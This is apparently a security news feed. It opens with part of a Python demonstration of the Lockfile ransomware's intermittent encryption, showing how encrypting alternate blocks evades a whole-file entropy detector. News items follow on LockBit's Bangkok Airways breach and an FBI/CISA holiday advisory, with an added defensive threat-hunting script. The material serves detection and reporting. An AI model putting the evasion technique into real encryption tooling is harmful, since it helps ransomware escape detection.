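    return xor(data, keystream(key, len(data)))


def encrypt_alternate(data, key):
    """Encrypt blocks 0, 2, 4, ... of BLOCK bytes; leave blocks 1, 3, 5, ... in cleartext."""
    ks = keystream(key, len(data))
    out = bytearray(data)
    for start in range(0, len(data), 2 * BLOCK):
        out[start:start + BLOCK] = xor(data[start:start + BLOCK], ks[start:start + BLOCK])
    return bytes(out)


def shannon_entropy(data):
    """Bits per byte; a uniformly random byte stream approaches 8.0."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def printable_ratio(data):
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / len(data)


def looks_encrypted(data, threshold=7.5):
    """A naive whole-file detector of the kind intermittent encryption is designed to evade."""
    return shannon_entropy(data) >= threshold


# Constructed sample document, roughly 9 KB of ordinary prose.
SAMPLE_DOC = (
    b"Quarterly report: revenue grew in every region while costs stayed flat. "
    b"The board approved the plan and asked for a follow-up at the next meeting.\n"
) * 60
KEY = b"example-key-not-from-lockfile"


def compare(doc=SAMPLE_DOC, key=KEY):
    """Return {variant: (entropy, printable_ratio, flagged_by_detector)}."""
    full = encrypt_full(doc, key)
    partial = encrypt_alternate(doc, key)
    return {
        "original": (shannon_entropy(doc), printable_ratio(doc), looks_encrypted(doc)),
        "full": (shannon_entropy(full), printable_ratio(full), looks_encrypted(full)),
        "alternate": (shannon_entropy(partial), printable_ratio(partial), looks_encrypted(partial)),
    }


if __name__ == "__main__":
    for name, (ent, printable, flagged) in compare().items():
        print(f"{name:9s} entropy={ent:.2f} printable={printable:.2f} flagged={flagged}")
```

The fully encrypted file sits close to 8 bits per byte and is flagged; the intermittently encrypted one keeps half of its bytes as readable text, so its whole-file entropy stays well under a threshold tuned for fully encrypted output and it is not flagged, even though every other block is unrecoverable without the key. A detector that scores fixed-size windows, or that looks at the fraction of windows with high entropy rather than the file as a whole, does not have this blind spot.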


Pierluigi Paganini

(SecurityAffairs – hacking, Lockfile ransomware)


LockBit ransomware operators leak 200GB of data belonging to Bangkok Airways

1 September 2021 at 11:03

LockBit ransomware operators have breached Bangkok Airways; the airline confirmed it was the victim and disclosed a data breach impacting its passengers.

Bangkok Airways, a regional airline based in Bangkok, disclosed a data breach resulting from a ransomware attack carried out by the LockBit ransomware operators.

The ransomware gang had posted a message on its leak site claiming to have breached the airline and threatening to leak the stolen data if the company does not pay the ransom.

LockBit claims to have stolen more than 200GB of data belonging to the company; the message published on its leak site mocks the poor security implemented by the company.

“We Have More Files (Extra +200GB) To Show. And Many More Things To Say… They said : “We protect our customers privacy” But with “[email protected]” for all systems and domain admins”


The company discovered the security breach on August 23 and immediately launched an investigation, with the assistance of a cybersecurity team, to determine the extent of the incident. Bangkok Airways also reported the breach to the authorities.

“An initial investigation of the incident appeared to confirm that some of the personal data may have been accessed which are, passenger name, family name, nationality, gender, phone number, email, address, contact information, passport information, historical travel information, partial credit card information, and special meal information. The company however, confirms that the incident did not affect the company’s operational or aeronautical security systems.” reads a press release published by the company. “This incident has been reported to the Royal Thai police as well as providing notification to the relevant authorities. For primary prevention measures, the company highly recommends passengers to contact their bank or credit card provider and follow their advice and change any compromised passwords as soon as possible.”

The airline company said that the security breach did not impact Bangkok Airways’ operational or aeronautical security systems, but attackers may have had access to personal data belonging to passengers.

Exposed data include passenger full names, nationality, gender, phone numbers, email and physical addresses, passport info, historical travel data, partial credit card info, and special meal details.

Bangkok Airways warns its customers to be vigilant and be aware of any suspicious or unsolicited calls and/or emails, as the attacker may attempt to carry out malicious activities such as phishing attacks. 

LockBit is the same ransomware gang that stole 6TB of data from Accenture and demanded a $50 million ransom not to leak it.

The gang also hit another airline: on August 23, LockBit operators published data stolen from Ethiopian Airlines on its leak site.

BleepingComputer, which contacted the threat actors, reported that they claim to have access to information that could allow them to target Accenture’s customers.

“Although the hackers declined to name a victim, they claimed to have compromised an airport that was using Accenture software and encrypted its systems.” reported Bleeping Computer.


Pierluigi Paganini

(SecurityAffairs – hacking, Bangkok Airways )


Watch out, ransomware attack risk increases on holidays and weekends, FBI and CISA

1 September 2021 at 13:27

The FBI and CISA issued a joint cybersecurity advisory to warn organizations to remain vigilant against ransomware attacks during weekends or holidays.

The FBI and CISA warn organizations to keep their defenses high against ransomware attacks during weekends and holidays.

The agencies have observed an increase in ransomware attacks on holidays and weekends; attackers favor these periods because fewer staff are on duty and defenses are correspondingly weaker.

“Today, the Federal Bureau of Investigation (FBI) and CISA released a Joint Cybersecurity Advisory (CSA) to urge organizations to ensure they protect themselves against ransomware attacks during holidays and weekends—when offices are normally closed.” reads the advisory published by CISA. “Although FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday, malicious cyber actors have launched serious ransomware attacks during other holidays and weekends in 2021.”

The FBI and CISA focus on attacks against organizations in the United States, citing the attacks on Colonial Pipeline, JBS and Kaseya as case studies.

The agencies shared a few examples of attacks orchestrated by ransomware gangs ahead of holidays and weekends:

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations—including multiple managed service providers and their customers.

The ransomware families that have been most active over the last month are Conti, PYSA, LockBit, RansomEXX/Defray777, Zeppelin, and Crysis/Dharma/Phobos.

Most of the attacks leverage phishing and brute-forcing of unsecured Remote Desktop Protocol (RDP) endpoints as initial attack vectors to compromise the networks of the organizations and deploy the ransomware.

The FBI and CISA recommend organizations conduct threat hunting on their networks aimed at searching for any signs of threat actor activity to prevent attacks before they occur or to minimize the impact of successful attacks.

“Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems.” reads the joint alert.

Experts suggest focusing on:

  • Understand the IT environment’s routine activity and architecture by establishing a baseline;
  • Review data logs;
  • Employ intrusion prevention systems and automated security alerting systems;
  • Deploy honeytokens.

Some Indicators of suspicious activity that organizations should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.
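The hunting elements above (establish a baseline, review logs, automated alerting) and several of the listed indicators (anomalous logon times, geographical irregularities, a jump in database read volume) can be turned into a small baseline-driven detector. The following is an added example, not code from the advisory or from Security Affairs; the event tuples, user names, countries, thresholds (HOUR_SLACK, READ_SPIKE) and the "Labor Day weekend" hunt window are all constructed for illustration.

```python
"""Baseline-based threat hunting over constructed authentication and database audit events."""
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry (not real logs): (timestamp, user, source country, event, value).
# For "logon" events the value is unused; for "db_read" it is the number of rows read.
BASELINE_EVENTS = [
    ("2021-08-02T08:55:00", "alice", "US", "logon", 0),
    ("2021-08-02T10:10:00", "alice", "US", "db_read", 1200),
    ("2021-08-03T09:05:00", "alice", "US", "logon", 0),
    ("2021-08-03T14:30:00", "alice", "US", "db_read", 900),
    ("2021-08-02T17:40:00", "bob", "US", "logon", 0),
    ("2021-08-04T18:02:00", "bob", "US", "logon", 0),
    ("2021-08-04T18:20:00", "bob", "US", "db_read", 300),
]

# Constructed events from a holiday-weekend window that we want to hunt through.
HUNT_EVENTS = [
    ("2021-09-04T02:13:00", "alice", "US", "logon", 0),        # Saturday 02:13, far outside alice's usual hours
    ("2021-09-04T02:20:00", "alice", "US", "db_read", 48000),  # bulk read, possible staging before exfiltration
    ("2021-09-05T11:00:00", "bob", "RU", "logon", 0),          # country never seen in bob's baseline
    ("2021-09-06T17:50:00", "bob", "US", "logon", 0),          # consistent with bob's baseline
    ("2021-09-06T18:05:00", "bob", "US", "db_read", 350),      # within bob's normal read volume
]

HOUR_SLACK = 1     # tolerate logons one hour either side of the user's baseline hour range
READ_SPIKE = 5.0   # flag a db_read larger than N times the user's largest baseline read


def parse(ts):
    return datetime.fromisoformat(ts)


def build_baseline(events):
    """Per-user routine activity: countries seen, logon hours seen, largest single read."""
    base = defaultdict(lambda: {"countries": set(), "hours": set(), "max_read": 0})
    for ts, user, country, event, value in events:
        b = base[user]
        if event == "logon":
            b["countries"].add(country)
            b["hours"].add(parse(ts).hour)
        elif event == "db_read":
            b["max_read"] = max(b["max_read"], value)
    return base


def hunt(events, baseline):
    """Return (rule, user, detail) findings for events that deviate from the baseline."""
    findings = []
    for ts, user, country, event, value in events:
        b = baseline.get(user)
        if b is None:
            findings.append(("unknown-user", user, ts))
            continue
        if event == "logon":
            if country not in b["countries"]:
                findings.append(("geo-irregularity", user, f"{ts} from {country}"))
            hour = parse(ts).hour
            if b["hours"]:
                lo = min(b["hours"]) - HOUR_SLACK
                hi = max(b["hours"]) + HOUR_SLACK
                if not lo <= hour <= hi:
                    findings.append(("anomalous-logon-time", user, f"{ts} hour={hour}"))
        elif event == "db_read" and b["max_read"] and value > READ_SPIKE * b["max_read"]:
            findings.append(("db-read-spike", user, f"{ts} rows={value}"))
    return findings


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_EVENTS)
    for rule, user, detail in hunt(HUNT_EVENTS, baseline):
        print(f"[{rule}] {user}: {detail}")
```

Run against the constructed data, the hunt reports alice's 02:13 logon and 48,000-row read and bob's logon from a country absent from his baseline (also outside his usual hours), while bob's ordinary weekday-evening activity produces nothing. In practice the baseline would be built from weeks of authentication and database audit logs rather than a handful of tuples, and each rule would feed an alerting pipeline rather than a print loop.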

CISA pointed out that it provides a range of free cyber hygiene services, such as vulnerability scanning and ransomware readiness assessments, to help organizations determine their attack surface and reduce it.

Both agencies also encourage victims of ransomware attacks to share forensic artifacts as part of their incident report, including:

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

The Joint report provides the following recommendations to the organizations:

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Watch out, ransomware attack risk increases on holidays and weekends, FBI and CISA appeared first on Security Affairs.
